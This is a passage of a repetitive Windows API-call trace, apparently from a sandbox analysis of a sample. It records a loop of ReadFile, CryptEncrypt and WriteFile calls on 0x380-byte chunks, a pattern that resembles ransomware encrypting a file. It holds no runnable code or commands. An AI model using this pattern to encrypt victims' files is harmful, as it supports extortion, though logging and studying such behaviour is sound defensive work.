lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.636] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.636] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.637] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.637] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.637] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.637] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.637] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.637] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.637] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.638] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.638] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.639] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.639] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.640] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.640] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.641] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.641] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.642] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.642] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.643] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.643] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.644] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) 